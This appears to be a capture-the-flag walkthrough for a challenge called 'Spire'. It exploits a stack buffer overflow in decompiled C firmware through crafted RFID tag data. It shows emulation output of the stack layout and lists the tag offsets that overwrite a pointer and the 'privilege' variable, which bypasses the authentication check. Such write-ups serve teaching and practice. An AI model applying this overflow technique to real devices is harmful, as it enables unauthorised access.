# 'Spire' Walkthrough

## Overview

At first glance there is not much we can do to get authenticated in this
challenge, a variable named `privilege` has to be greater than 0 but is
initialized to 0 and never change after that. However there is a clear buffer
overflow situation that we can exploit.

## Solution

__Step #1:__

The goal is to put something in `privilege` so we can pass the verification. Below
are the important parts of the function with comments on which loop does what.

```c
local_64 = 0x3020100;
uStack96 = 0x7060504;
local_68 = 0;
local_6c = 0;
privilege = 0;
local_38 = 0;
local_74 = 1;
local_78[0] = 2;

i = 0;
while (i < 8) {
    // overflow the variables used in loops conditions
    local_78[i] = p.RFID[i + 0x280];
        i = i + 1;
}

// we want this condition to not be verified so we can rewrite some variables
// thanks to the while loop in the else branch
if (p.RFID[0x36F] == 0) {
    j = 0;
    while (j <= local_74) {
        j = j + 1;
    }
}
else {
    // overflow the 'privilege' var (and other stuff)
    k = 0;
    while (local_74 <= k) {
      *((int)&local_64 + k) = p.RFID[k + 0x2CF];
      k = k + -1;
    }
}

*local_68 = 0;
// is debug mode enabled?
if (p.RFID[832] == '\x01') {
    printf((Print *)&Serial,"%x\n",&local_6c);
    printf((Print *)&Serial,"%x\n",local_6c);
    [...]
}
```

`local_78[]` can take up to 4 bytes but 8 are written in it in the first `while`
loop. It will causes the variables next to it in the stack to be replaced by
what is in the tag starting at offset 0x280.

Then we see that if `p.RFID[0x36F]` is different than 0 we enter the `while` loop
which will write data from the tag starting at the address of `local_64`, but to
do so we need to overwrite `local_74` with a negative value. Since it is `k` that
is decremented, in `senderF-spire.py` the data will have to be at offset 0x280
backwards.

To get better insight on the stack layout we used emulation and binary
instrumentation to take advantage of the ordered access to all important
variables by printing the content of registers instead of calling `printf()`.

We first thought that if we put only zeros in the tag except for offset 0x832 we
would be able to just look at the serial output to get the stack layout. However
it did not work because of the `*local_68 = 0;`. We did not pay much attention
to it since the original decompiled line was`_FUN_00000000 = 0;` but it turned
out that it triggered a `segfault` because the variable was equal to 0.. This
"detail" made us go down the wrong road for quite some time.

__Step #2:__

Now that we know that we also have to fill `local_68` with a writeable address,
we need to find one. Here we simply took an address from the data section, where
there was not any data present (to avoid potential side affects). We choose
`0x1FFF8804`. We had already seen this address involved in `challenge_6` to
access padding data for a hash computation so we were pretty confident that it
will be map in the context of the board's process execution.

Following is the output we got with our emulation script.

```bash
[+] Setting up emulation environment..
[+] Binary mapped.
[+] Stack mapped.
[+] Registers set.
[+] All set. Now running..
&local_78 = 0x175b88
&local_78 = 0x175b89
&local_78 = 0x175b8a
&local_78 = 0x175b8b
&local_78 = 0x175b8c # <= we are now overwriting variables located after the array (here 'local_74')
&local_78 = 0x175b8d
&local_78 = 0x175b8e
&local_78 = 0x175b8f
writing 0x0 at 0x175b9c
writing 0x1f at 0x175b9b
writing 0xff at 0x175b9a
writing 0x88 at 0x175b99
writing 0x4 at 0x175b98 # <= address of 'local_68'
writing 0x0 at 0x175b97
writing 0x0 at 0x175b96
writing 0x0 at 0x175b95
writing 0x0 at 0x175b94
writing 0x0 at 0x175b93
writing 0x0 at 0x175b92
writing 0x0 at 0x175b91
writing 0x3 at 0x175b90 # <= address of 'privilege'
writing 0x0 at 0x175b8f
(debug) Trying to write 0x0 at 0x1fff8804
[-] Trying to write at 0x1fff8804
&local_68 = 0x175b98
local_68 = bytearray(b'\x04\x88\xff\x1f')
&local_64 = 0x175b9c
local_64 = bytearray(b'\x00\x01\x02\x03')
&privilege = 0x175b90
privilege = bytearray(b'\x03\x00\x00\x00')
&local_74 = 0x175b8c
local_74 = bytearray(b'\x00\x00\x00\x00')
privilege = 0x3
```

__Step #3:__

To resume, in our tag, we need to put data at 4 locations:
- 0x278 to 0x280: to overwrite `local_74` with a negative value;
- 0x2c3 to 0x2cf: address to put in `local_68` plus data for `privilege`;
- 0x340: to enable debug output (optional for on board test);
- 0x36f: to get into the `while` loop.

## Validation

__Points:__ 150
__Hash:__ da40489dbcb3722ecaef8230d1210a45023af7d35c7c95d042ded557b199a3bf
